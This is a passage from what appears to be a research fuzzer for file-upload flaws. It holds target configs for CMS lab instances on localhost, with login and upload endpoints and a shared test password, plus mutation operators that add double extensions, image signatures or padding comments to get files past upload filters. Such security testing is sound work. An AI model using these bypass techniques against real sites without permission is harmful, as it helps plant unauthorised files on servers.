29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/monstra-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln-web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/monstra/users/login
10 | WebLoginPageURL = http://127.0.0.1/monstra/users/login
11 | WebLoginCSRFName = csrf
12 | WebLoginAdditionalValue = login_submit=Log In
13 | WebLoginSuccessStr = >Log Out</a></li>
14 | WebUploadURL = http://127.0.0.1/monstra/admin/index.php?id=filemanager
15 | WebUploadPageURL = http://127.0.0.1/monstra/admin/index.php?id=filesmanager
16 | WebUploadFormAttr = class=form-inline
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = csrf
19 | WebUploadSuccessStr = %filename#
20 | WebUploadAdditionalValue = upload_file=Upload
21 | WebUploadedFileUrlPattern = http://127.0.0.1/monstra/public/uploads/[0-9|a-f]{32}(_[a-z|A-Z|0-9|_]*)*.[a-z|A-Z|0-9]*
22 | WebUploadFilesURL = http://127.0.0.1/monstra/admin/index.php?id=filesmanager&path=uploads/
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/x2engine-new-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = LoginForm[username]
 8 | WebLoginPWName = LoginForm[password]
 9 | WebLoginURL = http://127.0.0.1/x2crm2/x2engine/index.php/site/login 
10 | WebLoginPageURL = http://127.0.0.1/x2crm2/x2engine/index.php/site/login
11 | WebLoginCSRFName = YII_CSRF_TOKEN
12 | WebLoginAdditionalValue = LoginForm[rememberMe]=0;LoginForm[twoFactorCode]=;geoCoords=
13 | WebLoginSuccessStr = >Logout<
14 | WebUploadURL = http://127.0.0.1/x2crm2/x2engine/index.php/site/tmpUpload
15 | WebUploadPageURL = http://127.0.0.1/x2crm2/x2engine/index.php/media/upload
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = YII_CSRF_TOKEN
19 | WebUploadSuccessStr = :
20 | WebUploadAdditionalValue = upload=%filebinary#;TempFileId=;Media[name]=;Media[associationType]=none;Media[associationId]=;Media[private]=0;Media[description]=
21 | WebUploadedFileUrlPattern =
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = True
29 | MonitorHost = 127.0.0.1 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/mutation_op/m12_html.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {
 8 | 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX']}
 9 |                         # operations in this list can be used to extra mutation.
10 |   __resource__ = {} # ({type:resource filename})
11 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
12 | 
13 |   def operation(self, output, seed_file, resource_file=None):
14 |       if output['filename'] != None and len(output['filename']) > 0:
15 |         filename = output['filename']
16 |       else:
17 |         filename = utils.extract_filename(seed_file)
18 | 
19 |       output['filename'] = filename + '_M12HTML'
20 | 
21 |       output['fileext'] = 'html.'+output['fileext']
22 | 


--------------------------------------------------------------------------------
/configs/microweber-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = root@localhost.no
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/microweber/api/user_login
10 | WebLoginPageURL = http://127.0.0.1/microweber/api/user_login
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue = where_to=admin_content
13 | WebLoginSuccessStr = "success":
14 | WebUploadURL = http://127.0.0.1/microweber/plupload?token=%domtoken:\+= \'token=[a-z|A-Z|0-9|+|/]{40}@[a-z|A-Z|0-9|\+|/]{40}# 
15 | WebUploadPageURL = http://127.0.0.1/microweber/admin/view:modules/load_module:files
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr = %notin="error" : #
20 | WebUploadAdditionalValue = name=%filename#;file=%filebinary#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/microweber/userfiles/media/127.0.0.1/[a-z|0-9]{32}_[0-9|a-z|_|.]*\.[a-z|0-9]*
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | DBHost = 
32 | DBPort = 
33 | 


--------------------------------------------------------------------------------
/configs/zencart-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = admin_name
 8 | WebLoginPWName = admin_pass
 9 | WebLoginURL = http://127.0.0.1/zencart/coUnt-ddR-Buses/login.php?camefrom=index.php
10 | WebLoginPageURL = http://127.0.0.1/zencart/coUnt-ddR-Buses/login.php
11 | WebLoginCSRFName = securityToken;action
12 | WebLoginAdditionalValue = 
13 | WebLoginSuccessStr = ">Logoff</a></
14 | WebUploadURL = http://127.0.0.1/zencart/coUnt-ddR-Buses/media_manager.php?page=1&mID=3&action=save 
15 | WebUploadPageURL = http://127.0.0.1/zencart/coUnt-ddR-Buses/media_manager.php?action=edit&page=&mID=3
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = securityToken
19 | WebUploadSuccessStr = Extras
20 | WebUploadAdditionalValue = media_name=test;clip_filename=%filebinary#;media_dir=;media_type=1;add_clip=Add
21 | WebUploadedFileUrlPattern = http://127.0.0.1/zencart/media/%filename#
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1 
30 | MonitorPort = 
31 | 
32 | 


--------------------------------------------------------------------------------
/rabbitmq.py:
--------------------------------------------------------------------------------
 1 | import pika
 2 | import json
 3 | 
 4 | class mqMsgqIo(object):
 5 |   conn = None
 6 |   channel = None
 7 |   status = None
 8 |   qName = None
 9 |   def __init__(self, host='localhost'):
10 |     self.conn = pika.BlockingConnection(pika.ConnectionParameters(host,heartbeat=100))
11 |     self.channel = self.conn.channel()
12 |   def msgqDeclare(self,qName,init=False):
13 |     try:
14 |       self.qName = qName
15 |       if init:
16 |         self.channel.queue_delete(queue=self.qName)
17 |     except:
18 |       pass
19 |     self.channel.queue_declare(queue=self.qName)
20 |   def push(self,data):
21 |     self.channel.basic_publish(exchange='',routing_key=self.qName, body=data)
22 |   def workerize(self,callback):
23 |     self.channel.basic_consume(callback, queue=self.qName)#, no_ack=True)
24 |     self.channel.start_consuming()
25 |   def process_data_events(self):
26 |     self.conn.process_data_events()
27 | 
28 |   def close(self):
29 |     self.conn.close()
30 | 
31 | def wrap(data):
32 |   try:
33 |     wrapped_data = json.dumps(data)
34 |   except:
35 |     wrapped_data = None
36 |   return wrapped_data
37 | 
38 | def unwrap(wrapped_data):
39 |   try:
40 |     data = json.loads(wrapped_data)
41 |   except:
42 |     data = None
43 |   return data
44 | 


--------------------------------------------------------------------------------
/configs/octobercms-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html
 6 | WebHost = http://127.0.0.1:50023
 7 | WebLoginIDName = login
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1:50023/october/backend/backend/auth/signin
10 | WebLoginPageURL = http://127.0.0.1:50023/october/backend/backend/auth/signin
11 | WebLoginCSRFName = _session_key;_token
12 | WebLoginAdditionalValue = postback=1
13 | WebLoginSuccessStr = Sign out
14 | WebUploadURL = http://127.0.0.1:50023/october/backend/backend/media
15 | WebUploadPageURL = http://127.0.0.1:50023/october/backend/backend/media
16 | WebUploadFormAttr =
17 | WebUploadCustomHeader = X-OCTOBER-FILEUPLOAD=MediaManager-manager
18 | WebUploadCSRFName = %headertoken:html_tag@meta=name=csrf-token=content=X-CSRF-TOKEN#;%cookietoken#
19 | WebUploadSuccessStr = "result":"success"
20 | #WebUploadSuccessStr = "
21 | WebUploadAdditionalValue = path=/test;file_data=%filebinary#
22 | WebUploadedFileUrlPattern = http://127.0.0.1:50023/october/storage/app/media/test/%filename#
23 | WebUploadFilesURL = 
24 | WebUploadFilesParameter = 
25 | 
26 | [DETECTOR_CONF]
27 | 
28 | MutationChainLimit = 99
29 | MonitorEnable = false
30 | MonitorHost = 127.0.0.1
31 | MonitorPort = 50123
32 | 


--------------------------------------------------------------------------------
/configs/symphony-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/symphony/symphony/login/
10 | WebLoginPageURL = http://127.0.0.1/symphony/symphony/
11 | WebLoginCSRFName = xsrf
12 | WebLoginAdditionalValue = action[login]=
13 | WebLoginSuccessStr = l">Log out</a>
14 | WebUploadURL = http://127.0.0.1/symphony/symphony/publish/articles/new/ 
15 | WebUploadPageURL = http://127.0.0.1/symphony/symphony/publish/articles/new/
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = xsrf
19 | WebUploadSuccessStr = >Delete</button>
20 | WebUploadAdditionalValue = MAX_FILE_SIZE=5242880;fields[title]=%filename#;fields[body]=fusetest;fields[date]=03/15/2019 8:16 pm;fields[categories]=2;fields[fileupload]=%filebinary#;action[save]=Save Changes;action[timestamp]=2019-03-15T20:17:02+09:00
21 | WebUploadedFileUrlPattern = http://127.0.0.1/symphony/workspace/uploads/[a-z|0-9|\_|\-]*(.[a-z|0-9]*)?
22 | WebUploadFilesURL = 
23 | WebUploadFilesParameter = 
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/concrete5-credential-non-monitor_new.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = admin
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = uName
 8 | WebLoginPWName = uPassword
 9 | WebLoginURL = http://127.0.0.1/concrete5/index.php/login/authenticate/concrete
10 | WebLoginPageURL = http://127.0.0.1/concrete5/index.php/login
11 | WebLoginCSRFName = ccm_token
12 | WebLoginAdditionalValue =  
13 | WebLoginSuccessStr = >admin</a>
14 | WebUploadURL = http://127.0.0.1/concrete5/index.php/ccm/system/file/upload
15 | WebUploadPageURL = http://127.0.0.1/concrete5/index.php/dashboard/files/search
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = ccm_token
19 | WebUploadSuccessStr = [{"canCopyFile":1
20 | WebUploadAdditionalValue = currentFolder=0;file=%filebinary#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/concrete5/application/files/[0-9]{4}/[0-9]{4}/[0-9]{4}/%genfile#
22 | WebUploadFilesURL = http://127.0.0.1/concrete5/index.php/ccm/system/file/folder/contents?&ccm_order_by=folderItemModified&ccm_order_by_direction=desc&ccm_cursor=
23 | WebUploadFilesParameter = 
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/composr-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = login_username
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/composr/index.php?page=login&type=login
10 | WebLoginPageURL = http://127.0.0.1/composr/index.php?page=start&redirected=1 
11 | WebLoginCSRFName = csrf_token
12 | WebLoginAdditionalValue = redirect=http://127.0.0.1/composr/index.php?page=start
13 | WebLoginSuccessStr = vuln_web</strong>
14 | WebUploadURL = http://127.0.0.1/composr/data/incoming_uploads.php?keep_session=%cookie:reg:cms_session__[0-9|a-f]{32}# 
15 | WebUploadPageURL = http://127.0.0.1/composr/cms/index.php?page=cms-downloads&type=add&cat=1&redirect=http%3A%2F%2F127.0.0.1%2Fcomposr%2Fsite%2Findex.php%3Fpage%3Ddownloads%26redirected%3D1 
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | #WebUploadSuccessStr = "upload_savename": 
20 | WebUploadSuccessStr = "
21 | WebUploadAdditionalValue = name=%filename#;file=%filebinary#
22 | WebUploadedFileUrlPattern =
23 | WebUploadFilesURL =
24 | WebUploadFilesParameter =
25 | 
26 | [DETECTOR_CONF]
27 | 
28 | MutationChainLimit = 99
29 | MonitorEnable = True
30 | MonitorHost = 127.0.0.1 
31 | MonitorPort = 
32 | 


--------------------------------------------------------------------------------
/configs/concrete5-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = admin
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = uName
 8 | WebLoginPWName = uPassword
 9 | WebLoginURL = http://127.0.0.1/concrete5/index.php/login/authenticate/concrete
10 | WebLoginPageURL = http://127.0.0.1/concrete5/index.php/login
11 | WebLoginCSRFName = ccm_token
12 | WebLoginAdditionalValue =  
13 | WebLoginSuccessStr = >admin</a>
14 | WebUploadURL = http://127.0.0.1/concrete5/index.php/ccm/system/file/upload
15 | WebUploadPageURL = http://127.0.0.1/concrete5/index.php/tools/required/files/import?currentFolder=0 
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = ccm_token
19 | WebUploadSuccessStr = [{"canCopyFile":1
20 | WebUploadAdditionalValue = currentFolder=0;file=%filebinary#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/concrete5/application/files/[0-9]{4}/[0-9]{4}/[0-9]{4}/%genfile#
22 | WebUploadFilesURL = http://127.0.0.1/concrete5/index.php/ccm/system/file/folder/contents?&ccm_order_by=folderItemModified&ccm_order_by_direction=desc&ccm_cursor=
23 | WebUploadFilesParameter = 
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/getsimplecms-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = userid
 8 | WebLoginPWName = pwd
 9 | WebLoginURL = http://127.0.0.1/getsimplecms/admin/index.php
10 | WebLoginPageURL = http://127.0.0.1/getsimplecms/admin/
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue = submitted=Login
13 | WebLoginSuccessStr = ><em>L</em>ogout
14 | WebUploadURL = http://127.0.0.1/getsimplecms/admin/upload.php?path= 
15 | WebUploadPageURL = http://127.0.0.1/getsimplecms/admin/upload.php
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = 
19 | WebUploadSuccessStr = %notin=problem#
20 | WebUploadAdditionalValue = file[]=%filebinary#;hash=%domtoken:value="[a-f|0-9]{40}"@[a-f|0-9]{40}#;submit=Upload
21 | # WebUploadAdditionalValue = Filename=%filename#;sessionHash=%domtoken: '[a-f|0-9]{40}',@[a-f|0-9]{40}#;Filedata=%filebinary#;Upload=Submit Query
22 | WebUploadedFileUrlPattern = ../data/uploads/[0-9|a-f]{32}(_[a-z|0-9|\_]*)*(\.[a-z|0-9]*)+
23 | WebUploadFilesURL = http://127.0.0.1/getsimplecms/admin/upload.php?
24 | WebUploadFilesParameter =
25 | 
26 | [DETECTOR_CONF]
27 | 
28 | MutationChainLimit = 99
29 | MonitorEnable = False
30 | MonitorHost = 127.0.0.1
31 | MonitorPort = 
32 | 


--------------------------------------------------------------------------------
/configs/collabtive-credential-mk2-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = username
 8 | WebLoginPWName = pass
 9 | WebLoginURL = http://127.0.0.1/collabtive/manageuser.php?action=login
10 | WebLoginPageURL = http://127.0.0.1/collabtive/index.php
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue =  
13 | WebLoginSuccessStr = <span>My Account
14 | WebUploadURL = http://127.0.0.1/collabtive/manageuser.php?action=edit 
15 | WebUploadPageURL = http://127.0.0.1/collabtive/manageuser.php?action=editform&id=1
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr = %filename#
20 | WebUploadAdditionalValue = address1=;address2=;admin=;company=;name=vuln_web;userfile=%filebinary#;file-avatar=;email=asdf@df.as;web=;tel1=;tel2=;zip=;country=;state=;gender=;locale=;oldpass=;newpass=;repeatpass=
21 | WebUploadedFileUrlPattern = files/standard/avatar/([0-9|a-f]{32})(_M[0-9]{1,2}[A-Z|0-9]*)+_[0-9]{5,6}.txt
22 | WebUploadFilesURL = http://127.0.0.1/collabtive/manageuser.php?action=profile&id=1&mode=edited
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/mybb-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/mybb/
 6 | WebHost = http://127.0.0.1/mybb/
 7 | WebLoginIDName = quick_username
 8 | WebLoginPWName = quick_password
 9 | WebLoginURL = http://127.0.0.1/mybb/member.php
10 | WebLoginPageURL = http://127.0.0.1/mybb/member.php
11 | WebLoginCSRFName = my_post_key
12 | WebLoginAdditionalValue = action=do_login;url=http://127.0.0.1/mybb/index.php;quick_login=1;quick_remember=yes;submit=Login
13 | WebLoginSuccessStr = >You have successfully been logged in.<
14 | WebUploadURL = http://127.0.0.1/mybb/newthread.php?fid=2&processed=1
15 | WebUploadPageURL = http://127.0.0.1/mybb/newthread.php?fid=2
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = my_post_key;posthash
19 | #WebUploadSuccessStr = %filename#
20 | WebUploadSuccessStr = <head>
21 | WebUploadAdditionalValue = subject=;icon=-1;message=;postoptions[subscriptionmethod]=;newattachment=Add Attachment;action=do_newthread;attachmentaid=;attachmentact=;quoted_ids=;tid=0;numpolloptions=2;attachments[]=%filebinary#
22 | WebUploadedFileUrlPattern =
23 | WebUploadFilesURL =
24 | WebUploadFilesParameter =
25 | 
26 | [DETECTOR_CONF]
27 | 
28 | MutationChainLimit = 99
29 | MonitorEnable = True
30 | MonitorHost = 127.0.0.1 
31 | MonitorPort = 
32 | 


--------------------------------------------------------------------------------
/configs/eccube-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = login_id
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/eccube/html/vuln_web/login_check 
10 | WebLoginPageURL = http://127.0.0.1/eccube/html/vuln_web/
11 | WebLoginCSRFName = _csrf_token
12 | WebLoginAdditionalValue = 
13 | WebLoginSuccessStr = eccube/html/vuln_web/logout">
14 | WebUploadURL = http://127.0.0.1/eccube/html/vuln_web/content/file_manager?
15 | WebUploadPageURL = http://127.0.0.1/eccube/html/vuln_web/content/file_manager
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = form[_token]
19 | WebUploadSuccessStr = %filename#
20 | WebUploadAdditionalValue = mode=upload;now_file=/var/www/html/eccube/html/user_data/test;now_dir=/var/www/html/eccube/html/user_data/test;tree_select_file=/var/www/html/eccube/html/user_data/test;tree_status=/var/www/html/eccube/html/user_data/test;select_file=;form[file]=%filebinary#;form[create_file]=
21 | WebUploadedFileUrlPattern = http://127.0.0.1/eccube/html/user_data/test/%filename#
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/wordpress-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = log
 8 | WebLoginPWName = pwd
 9 | WebLoginURL = http://127.0.0.1/wordpress/wp-login.php
10 | WebLoginPageURL = http://127.0.0.1/wordpress/wp-login.php 
11 | WebLoginCSRFName = None
12 | WebLoginAdditionalValue = testcookie=1;redirect_to=http://127.0.0.1/wordpress/wp-admin/;wp-submit=Log In
13 | WebLoginSuccessStr = Edit My Profile
14 | WebUploadURL = http://127.0.0.1/wordpress/wp-admin/async-upload.php
15 | WebUploadPageURL = http://127.0.0.1/wordpress/wp-admin/media-new.php
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = _wpnonce
19 | WebUploadSuccessStr = %notin=error-div error#
20 | WebUploadAdditionalValue = name=%filename#;post_id=0;type=;tab=;short=1;async-upload=%filebinary#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/wordpress/wp-content/uploads/[0-9]{4}/[0-9]{2}/%genfile#
22 | WebUploadFilesURL = http://127.0.0.1/wordpress/wp-admin/admin-ajax.php
23 | WebUploadFilesParameter = action=query-attachments;post_id=0;query[orderby]=date&query[order]=DESC;query[posts_per_page]=40;query[paged]=1
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/mutation_op/m13.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation13: Appending Signature"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M13'], 'html':['M04_BZ2','M13'], 'xhtml':['M13','M8'], 'js':['M13']}#['M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       with open('./resource/test.jpg','rb') as fp:
19 |         data = fp.read(8)
20 | 
21 |       output['filename'] = filename + '_M13'
22 |       if output['content'][-1] == '\x0a':
23 |         output['content'] = output['content'][:-1]+data
24 |       else:
25 |         output['content'] += data
26 | 
27 | 


--------------------------------------------------------------------------------
/mutation_op/m09.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation09 : Prepending HTML Dummy Comment"
 6 |   __mutate_type__ = "request"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M06', 'M09','M04_BZ2','M04_XHT'], 'xhtml':['M06', 'M09','M04_BZ2']}#['M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 |       dummy = "<!--"+"a"*4096+"-->"
18 |       output['content'] = dummy + output['content']
19 |       output['filename'] = filename + '_M9'
20 | 


--------------------------------------------------------------------------------
/configs/silverstripe-credential-non-monitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = root@localhost.no 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = Email
 8 | WebLoginPWName = Password
 9 | WebLoginURL = http://127.0.0.1/silverstripe/Security/login/default/LoginForm/
10 | WebLoginPageURL = http://127.0.0.1/silverstripe/Security/login?BackURL=%2Fsilverstripe%2Fadmin%2Fpages%2F
11 | WebLoginCSRFName = SecurityID
12 | WebLoginAdditionalValue = AuthenticationMethod=SilverStripe\Security\MemberAuthenticator\MemberAuthenticator;BackURL=/silverstripe/admin/pages/;action_doLogin=Log in
13 | WebLoginSuccessStr = Default Admin
14 | WebUploadURL = http://127.0.0.1/silverstripe/admin/assets/api/createFile
15 | WebUploadPageURL = http://127.0.0.1/silverstripe/admin/assets/
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName =
19 | WebUploadSuccessStr = %notin="status":"error"#
20 | WebUploadAdditionalValue = SecurityID=%domtoken:,\"SecurityID\":\"[a-f|0-9]{40}\",\"en@[a-f|0-9]{40}#;ParentID=1;Upload=%filebinary#
21 | WebUploadedFileUrlPattern = http://127.0.0.1/silverstripe/assets/[a-f|0-9]{10}/%genfile#
22 | WebUploadFilesURL = 
23 | WebUploadFilesParameter = 
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/configs/xe-credential.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = root@localhost.no
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = user_id
 8 | WebLoginPWName = password
 9 | WebLoginURL = http://127.0.0.1/xe/index.php?act=procMemberLogin
10 | WebLoginPageURL = http://127.0.0.1/xe/index.php?act=dispMemberLoginForm
11 | WebLoginCSRFName = 
12 | WebLoginAdditionalValue = error_return_url=/xe/index.php?act=dispMemberLoginForm;mid=index;vid=;ruleset=@login;success_return_url=http://127.0.0.1/xe/index.php?module=admin;act=procMemberLogin;xe_validator_id=modules/member/skins
13 | WebLoginSuccessStr = Sign Out</a>
14 | WebUploadURL = http://127.0.0.1/xe/index.php?module=file&act=procFileUpload&mid=board 
